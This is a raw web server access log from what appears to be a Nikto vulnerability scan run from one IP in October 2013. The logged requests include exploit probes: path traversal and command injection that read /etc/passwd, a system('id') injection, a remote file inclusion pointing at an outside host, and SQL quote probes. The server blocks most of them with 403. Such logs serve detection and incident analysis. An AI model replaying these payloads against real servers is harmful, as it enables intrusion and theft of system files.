  279. 84.56.69.222 - - [23/Oct/2013:15:23:58 +0400] "GET /index.aspx HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:multiple_index)"
  280. 84.56.69.222 - - [23/Oct/2013:15:23:58 +0400] "GET /default.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:multiple_index)"
  281. 84.56.69.222 - - [23/Oct/2013:15:23:58 +0400] "GET /default.aspx HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:multiple_index)"
  282. 84.56.69.222 - - [23/Oct/2013:15:24:01 +0400] "GET /default.htm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:multiple_index)"
  283. 84.56.69.222 - - [23/Oct/2013:15:24:01 +0400] "GET /index.do HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:multiple_index)"
  284. 84.56.69.222 - - [23/Oct/2013:15:24:01 +0400] "GET /index.jhtml HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:multiple_index)"
  285. 84.56.69.222 - - [23/Oct/2013:15:24:04 +0400] "OPTIONS / HTTP/1.1" 200 47606 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:httpoptions: OPTIONS /)"
  286. 84.56.69.222 - - [23/Oct/2013:15:24:05 +0400] "DEBUG / HTTP/1.1" 200 47606 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:httpoptions: DEBUG)"
  287. 84.56.69.222 - - [23/Oct/2013:15:24:07 +0400] "GET /TiVoConnect?Command=QueryServer HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000001)"
  288. 84.56.69.222 - - [23/Oct/2013:15:24:07 +0400] "GET /TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000002)"
  289. 84.56.69.222 - - [23/Oct/2013:15:24:07 +0400] "GET /webcgi/cart32.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000003)"
  290. 84.56.69.222 - - [23/Oct/2013:15:24:07 +0400] "GET /scripts/cart32.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000003)"
  291. 84.56.69.222 - - [23/Oct/2013:15:24:07 +0400] "GET /webcgi/classified.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000004)"
  292. 84.56.69.222 - - [23/Oct/2013:15:24:08 +0400] "GET /scripts/classified.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000004)"
  293. 84.56.69.222 - - [23/Oct/2013:15:24:08 +0400] "GET /webcgi/download.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000005)"
  294. 84.56.69.222 - - [23/Oct/2013:15:24:08 +0400] "GET /scripts/download.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000005)"
  295. 84.56.69.222 - - [23/Oct/2013:15:24:08 +0400] "GET /webcgi/flexform.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000006)"
  296. 84.56.69.222 - - [23/Oct/2013:15:24:09 +0400] "GET /scripts/flexform.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000006)"
  297. 84.56.69.222 - - [23/Oct/2013:15:24:09 +0400] "GET /webcgi/flexform HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000007)"
  298. 84.56.69.222 - - [23/Oct/2013:15:24:09 +0400] "GET /scripts/flexform HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000007)"
  299. 84.56.69.222 - - [23/Oct/2013:15:24:11 +0400] "GET /webcgi/lwgate.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000008)"
  300. 84.56.69.222 - - [23/Oct/2013:15:24:12 +0400] "GET /scripts/lwgate.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000008)"
  301. 84.56.69.222 - - [23/Oct/2013:15:24:12 +0400] "GET /webcgi/LWGate.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000009)"
  302. 84.56.69.222 - - [23/Oct/2013:15:24:12 +0400] "GET /scripts/LWGate.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000009)"
  303. 84.56.69.222 - - [23/Oct/2013:15:24:12 +0400] "GET /webcgi/lwgate HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000010)"
  304. 84.56.69.222 - - [23/Oct/2013:15:24:13 +0400] "GET /scripts/lwgate HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000010)"
  305. 84.56.69.222 - - [23/Oct/2013:15:24:13 +0400] "GET /webcgi/LWGate HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000011)"
  306. 84.56.69.222 - - [23/Oct/2013:15:24:13 +0400] "GET /scripts/LWGate HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000011)"
  307. 84.56.69.222 - - [23/Oct/2013:15:24:13 +0400] "GET /webcgi/perlshop.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000012)"
  308. 84.56.69.222 - - [23/Oct/2013:15:24:13 +0400] "GET /scripts/perlshop.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000012)"
  309. 84.56.69.222 - - [23/Oct/2013:15:24:14 +0400] "GET /cfappman/index.cfm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000013)"
  310. 84.56.69.222 - - [23/Oct/2013:15:24:14 +0400] "GET /cfdocs/examples/cvbeans/beaninfo.cfm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000014)"
  311. 84.56.69.222 - - [23/Oct/2013:15:24:14 +0400] "GET /cfdocs/examples/parks/detail.cfm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000015)"
  312. 84.56.69.222 - - [23/Oct/2013:15:24:18 +0400] "GET /kboard/ HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000016)"
  313. 84.56.69.222 - - [23/Oct/2013:15:24:19 +0400] "GET /lists/admin/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000017)"
  314. 84.56.69.222 - - [23/Oct/2013:15:24:19 +0400] "GET /splashAdmin.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000018)"
  315. 84.56.69.222 - - [23/Oct/2013:15:24:22 +0400] "GET /ssdefs/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000019)"
  316. 84.56.69.222 - - [23/Oct/2013:15:24:22 +0400] "GET /sshome/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000020)"
  317. 84.56.69.222 - - [23/Oct/2013:15:24:23 +0400] "GET /tiki/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000021)"
  318. 84.56.69.222 - - [23/Oct/2013:15:24:23 +0400] "GET /tiki/tiki-install.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000022)"
  319. 84.56.69.222 - - [23/Oct/2013:15:24:23 +0400] "GET /scripts/samples/details.idc HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000023)"
  320. 84.56.69.222 - - [23/Oct/2013:15:24:24 +0400] "GET /_vti_bin/shtml.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000024)"
  321. 84.56.69.222 - - [23/Oct/2013:15:24:24 +0400] "GET /webcgi/handler.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000025)"
  322. 84.56.69.222 - - [23/Oct/2013:15:24:24 +0400] "GET /scripts/handler.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000025)"
  323. 84.56.69.222 - - [23/Oct/2013:15:24:24 +0400] "GET /webcgi/finger HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000026)"
  324. 84.56.69.222 - - [23/Oct/2013:15:24:25 +0400] "GET /scripts/finger HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000026)"
  325. 84.56.69.222 - - [23/Oct/2013:15:24:25 +0400] "GET /webcgi/finger.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000027)"
  326. 84.56.69.222 - - [23/Oct/2013:15:24:25 +0400] "GET /scripts/finger.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000027)"
  327. 84.56.69.222 - - [23/Oct/2013:15:24:26 +0400] "GET /webcgi/formmail.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000028)"
  328. 84.56.69.222 - - [23/Oct/2013:15:24:26 +0400] "GET /scripts/formmail.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000028)"
  329. 84.56.69.222 - - [23/Oct/2013:15:24:26 +0400] "GET /webcgi/formmail.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000029)"
  330. 84.56.69.222 - - [23/Oct/2013:15:24:26 +0400] "GET /scripts/formmail.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000029)"
  331. 84.56.69.222 - - [23/Oct/2013:15:24:26 +0400] "GET /webcgi/formmail HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000030)"
  332. 84.56.69.222 - - [23/Oct/2013:15:24:26 +0400] "GET /scripts/formmail HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000030)"
  333. 84.56.69.222 - - [23/Oct/2013:15:24:27 +0400] "GET /webcgi/get32.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000031)"
  334. 84.56.69.222 - - [23/Oct/2013:15:24:27 +0400] "GET /scripts/get32.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000031)"
  335. 84.56.69.222 - - [23/Oct/2013:15:24:27 +0400] "GET /webcgi/gm-authors.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000032)"
  336. 84.56.69.222 - - [23/Oct/2013:15:24:27 +0400] "GET /scripts/gm-authors.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000032)"
  337. 84.56.69.222 - - [23/Oct/2013:15:24:27 +0400] "GET /webcgi/guestbook/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000033)"
  338. 84.56.69.222 - - [23/Oct/2013:15:24:28 +0400] "GET /scripts/guestbook/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000033)"
  339. 84.56.69.222 - - [23/Oct/2013:15:24:28 +0400] "GET /webcgi/horde/test.php?mode=phpinfo HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000034)"
  340. 84.56.69.222 - - [23/Oct/2013:15:24:28 +0400] "GET /scripts/horde/test.php?mode=phpinfo HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000034)"
  341. 84.56.69.222 - - [23/Oct/2013:15:24:28 +0400] "GET /webcgi/photo/protected/manage.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000035)"
  342. 84.56.69.222 - - [23/Oct/2013:15:24:28 +0400] "GET /scripts/photo/protected/manage.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000035)"
  343. 84.56.69.222 - - [23/Oct/2013:15:24:29 +0400] "GET /webcgi/wrap.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000036)"
  344. 84.56.69.222 - - [23/Oct/2013:15:24:29 +0400] "GET /scripts/wrap.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000036)"
  345. 84.56.69.222 - - [23/Oct/2013:15:24:32 +0400] "GET /./ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000037)"
  346. 84.56.69.222 - - [23/Oct/2013:15:24:32 +0400] "GET /~root/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000038)"
  347. 84.56.69.222 - - [23/Oct/2013:15:24:32 +0400] "GET /cgi-bin/wrap HTTP/1.1" 404 272 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000039)"
  348. 84.56.69.222 - - [23/Oct/2013:15:24:32 +0400] "GET /forums//admin/config.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000040)"
  349. 84.56.69.222 - - [23/Oct/2013:15:24:32 +0400] "GET /forums//adm/config.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000040)"
  350. 84.56.69.222 - - [23/Oct/2013:15:24:33 +0400] "GET /forums//administrator/config.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000040)"
  351. 84.56.69.222 - - [23/Oct/2013:15:24:33 +0400] "GET /forums/config.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000041)"
  352. 84.56.69.222 - - [23/Oct/2013:15:24:33 +0400] "GET /ganglia/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000042)"
  353. 84.56.69.222 - - [23/Oct/2013:15:24:33 +0400] "GET /guestbook/guestbookdat HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000043)"
  354. 84.56.69.222 - - [23/Oct/2013:15:24:34 +0400] "GET /guestbook/pwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000044)"
  355. 84.56.69.222 - - [23/Oct/2013:15:24:34 +0400] "GET /help/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000045)"
  356. 84.56.69.222 - - [23/Oct/2013:15:24:34 +0400] "GET /hola/admin/cms/htmltags.php?datei=./sec/data.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000046)"
  357. 84.56.69.222 - - [23/Oct/2013:15:24:34 +0400] "GET /horde/imp/test.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000047)"
  358. 84.56.69.222 - - [23/Oct/2013:15:24:35 +0400] "GET /horde/test.php?mode=phpinfo HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000048)"
  359. 84.56.69.222 - - [23/Oct/2013:15:24:35 +0400] "GET /imp/horde/test.php?mode=phpinfo HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000049)"
  360. 84.56.69.222 - - [23/Oct/2013:15:24:35 +0400] "GET /imp/horde/test.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000050)"
  361. 84.56.69.222 - - [23/Oct/2013:15:24:35 +0400] "GET /index.html.bak HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000051)"
  362. 84.56.69.222 - - [23/Oct/2013:15:24:35 +0400] "GET /index.html~ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000052)"
  363. 84.56.69.222 - - [23/Oct/2013:15:24:35 +0400] "GET /index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000053)"
  364. 84.56.69.222 - - [23/Oct/2013:15:24:36 +0400] "GET /global.inc HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000054)"
  365. 84.56.69.222 - - [23/Oct/2013:15:24:39 +0400] "GET /webcgi/formmail.pl HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000055)"
  366. 84.56.69.222 - - [23/Oct/2013:15:24:39 +0400] "GET /scripts/formmail.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000055)"
  367. 84.56.69.222 - - [23/Oct/2013:15:24:39 +0400] "GET /webcgi/horde/test.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000056)"
  368. 84.56.69.222 - - [23/Oct/2013:15:24:39 +0400] "GET /scripts/horde/test.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000056)"
  369. 84.56.69.222 - - [23/Oct/2013:15:24:40 +0400] "GET /inc/common.load.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000057)"
  370. 84.56.69.222 - - [23/Oct/2013:15:24:40 +0400] "GET /inc/config.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000058)"
  371. 84.56.69.222 - - [23/Oct/2013:15:24:40 +0400] "GET /inc/dbase.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000059)"
  372. 84.56.69.222 - - [23/Oct/2013:15:24:40 +0400] "GET /webcgi/visadmin.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000060)"
  373. 84.56.69.222 - - [23/Oct/2013:15:24:40 +0400] "GET /scripts/visadmin.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000060)"
  374. 84.56.69.222 - - [23/Oct/2013:15:24:41 +0400] "GET /webcgi/html2chtml.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000061)"
  375. 84.56.69.222 - - [23/Oct/2013:15:25:02 +0400] "GET /webcgi/html2wml.cgi HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000062)"
  376. 84.56.69.222 - - [23/Oct/2013:15:25:03 +0400] "GET /scripts/html2wml.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000062)"
  377. 84.56.69.222 - - [23/Oct/2013:15:25:03 +0400] "GET /webcgi/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\\etc\\passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000063)"
  378. 84.56.69.222 - - [23/Oct/2013:15:25:03 +0400] "GET /scripts/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\\etc\\passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000063)"
  379. 84.56.69.222 - - [23/Oct/2013:15:25:03 +0400] "GET /webcgi/echo.bat?&dir+c:\\\\ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000064)"
  380. 84.56.69.222 - - [23/Oct/2013:15:25:03 +0400] "GET /scripts/echo.bat?&dir+c:\\\\ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000064)"
  381. 84.56.69.222 - - [23/Oct/2013:15:25:04 +0400] "GET /webcgi/excite;IFS=\\\"$\\\";/bin/cat /etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000065)"
  382. 84.56.69.222 - - [23/Oct/2013:15:25:04 +0400] "GET /scripts/excite;IFS=\\\"$\\\";/bin/cat /etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000065)"
  383. 84.56.69.222 - - [23/Oct/2013:15:25:05 +0400] "GET /webcgi/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd| HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000066)"
  384. 84.56.69.222 - - [23/Oct/2013:15:25:05 +0400] "GET /scripts/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd| HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000066)"
  385. 84.56.69.222 - - [23/Oct/2013:15:25:06 +0400] "GET /webcgi/guestbook.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000067)"
  386. 84.56.69.222 - - [23/Oct/2013:15:25:06 +0400] "GET /scripts/guestbook.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000067)"
  387. 84.56.69.222 - - [23/Oct/2013:15:25:06 +0400] "GET /webcgi/guestbook.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000068)"
  388. 84.56.69.222 - - [23/Oct/2013:15:25:06 +0400] "GET /scripts/guestbook.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000068)"
  389. 84.56.69.222 - - [23/Oct/2013:15:25:07 +0400] "GET /webcgi/ss HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000069)"
  390. 84.56.69.222 - - [23/Oct/2013:15:25:07 +0400] "GET /scripts/ss HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000069)"
  391. 84.56.69.222 - - [23/Oct/2013:15:25:08 +0400] "GET /forumdisplay.php?GLOBALS[]=1&f=2&comma=\\\".system('id').\\\" HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000070)"
  392. 84.56.69.222 - - [23/Oct/2013:15:25:08 +0400] "GET /guestbook/guestbook.html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000071)"
  393. 84.56.69.222 - - [23/Oct/2013:15:25:08 +0400] "GET /html/cgi-bin/cgicso?query=AAA HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000072)"
  394. 84.56.69.222 - - [23/Oct/2013:15:25:08 +0400] "GET /geeklog/users.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000073)"
  395. 84.56.69.222 - - [23/Oct/2013:15:25:08 +0400] "GET /gb/index.php?login=true HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000074)"
  396. 84.56.69.222 - - [23/Oct/2013:15:25:09 +0400] "GET /guestbook/admin.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000075)"
  397. 84.56.69.222 - - [23/Oct/2013:15:25:09 +0400] "GET /webcgi/gH.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000076)"
  398. 84.56.69.222 - - [23/Oct/2013:15:25:09 +0400] "GET /scripts/gH.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000076)"
  399. 84.56.69.222 - - [23/Oct/2013:15:25:09 +0400] "GET /webcgi/gm-cplog.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000077)"
  400. 84.56.69.222 - - [23/Oct/2013:15:25:09 +0400] "GET /scripts/gm-cplog.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000077)"
  401. 84.56.69.222 - - [23/Oct/2013:15:25:10 +0400] "GET /getaccess HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000078)"
  402. 84.56.69.222 - - [23/Oct/2013:15:25:10 +0400] "GET /help.html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000079)"
  403. 84.56.69.222 - - [23/Oct/2013:15:25:10 +0400] "GET /webcgi/gm.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000080)"
  404. 84.56.69.222 - - [23/Oct/2013:15:25:10 +0400] "GET /scripts/gm.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000080)"
  405. 84.56.69.222 - - [23/Oct/2013:15:25:10 +0400] "GET /filemanager/filemanager_forms.php?lib_path=http://cirt.net/rfiinc.txt? HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000081)"
  406. 84.56.69.222 - - [23/Oct/2013:15:25:11 +0400] "GET /webcgi/AT-admin.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000082)"
  407. 84.56.69.222 - - [23/Oct/2013:15:25:44 +0400] "GET /webcgi/auth_data/auth_user_file.txt HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000083)"
  408. 84.56.69.222 - - [23/Oct/2013:15:26:07 +0400] "GET /webcgi/awstats.pl HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000084)"
  409. 84.56.69.222 - - [23/Oct/2013:15:26:08 +0400] "GET /scripts/awstats.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000084)"
  410. 84.56.69.222 - - [23/Oct/2013:15:26:08 +0400] "GET /webcgi/awstats/awstats.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000085)"
  411. 84.56.69.222 - - [23/Oct/2013:15:26:08 +0400] "GET /scripts/awstats/awstats.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000085)"
  412. 84.56.69.222 - - [23/Oct/2013:15:26:09 +0400] "GET /webcgi/blog/mt.cfg HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000086)"
  413. 84.56.69.222 - - [23/Oct/2013:15:26:09 +0400] "GET /scripts/blog/mt.cfg HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000086)"
  414. 84.56.69.222 - - [23/Oct/2013:15:26:10 +0400] "GET /webcgi/cart.pl?db=' HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000087)"
  415. 84.56.69.222 - - [23/Oct/2013:15:26:10 +0400] "GET /scripts/cart.pl?db=' HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000087)"
  416. 84.56.69.222 - - [23/Oct/2013:15:26:10 +0400] "GET /webcgi/cart.pl?db=' HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000088)"
  417. 84.56.69.222 - - [23/Oct/2013:15:26:10 +0400] "GET /scripts/cart.pl?db=' HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000088)"
